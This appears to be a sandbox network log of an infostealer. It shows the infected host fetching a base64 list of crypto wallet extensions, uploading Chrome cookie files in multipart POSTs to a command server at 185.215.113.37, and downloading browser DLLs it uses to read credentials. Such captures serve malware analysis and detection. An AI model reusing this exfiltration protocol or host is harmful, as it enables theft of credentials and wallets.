TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 26, 2024 06:00:09.954183102 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Sep 26, 2024 06:00:09.954195023 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Sep 26, 2024 06:00:09.954415083 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Sep 26, 2024 06:00:09.954428911 CEST	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Sep 26, 2024 06:00:09.954653978 CEST	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Sep 26, 2024 06:00:10.008712053 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDB Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 2d 2d 0d 0a Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="message"fplugins------JJEGCBGIDHCAKEBGIIDB--
Sep 26, 2024 06:00:10.227618933 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:10 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 26, 2024 06:00:10.314301968 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEG Host: 185.215.113.37 Content-Length: 7195 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 06:00:10.314505100 CEST	7195	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 26, 2024 06:00:11.653809071 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 06:00:11.653889894 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 06:00:11.653978109 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 06:00:11.903376102 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 06:00:12.120049953 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 26, 2024 06:00:12.120083094 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 26, 2024 06:00:12.120101929 CEST	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Sep 26, 2024 06:00:13.480989933 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGC Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZkxpLXRRbnZpaG81aEtKWEtETmcwa1hJUG5mVGN1d1Y1cjdScWpUODkzcFdHSkY3a2xLcWxkQm9qNHJESnZ4ZkZsZ0RPQ2NXOWFLRG5VOXpJbFVoMkxQMHZPOGszdVQwZ0hKRDFKdlZBY2xrSm5Ld1pHNmhEQWw2MkhyTXhOclVlcVNSLVdGMUotbDlZWWdFCg==------DGCBAFIJDGHCAKECAEGC--
Sep 26, 2024 06:00:13.784197092 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGC Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZkxpLXRRbnZpaG81aEtKWEtETmcwa1hJUG5mVGN1d1Y1cjdScWpUODkzcFdHSkY3a2xLcWxkQm9qNHJESnZ4ZkZsZ0RPQ2NXOWFLRG5VOXpJbFVoMkxQMHZPOGszdVQwZ0hKRDFKdlZBY2xrSm5Ld1pHNmhEQWw2MkhyTXhOclVlcVNSLVdGMUotbDlZWWdFCg==------DGCBAFIJDGHCAKECAEGC--
Sep 26, 2024 06:00:15.019922018 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:14 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 06:00:15.151707888 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECG Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="file"------IECFIEGDBKJKFIDHIECG--
Sep 26, 2024 06:00:15.867189884 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 06:00:16.567497969 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJE Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="file"------HCGCBFHCFCFBFIEBGHJE--
Sep 26, 2024 06:00:17.341314077 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 06:00:17.900485039 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 06:00:18.247203112 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 26, 2024 06:00:19.104085922 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 06:00:19.320931911 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:19 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 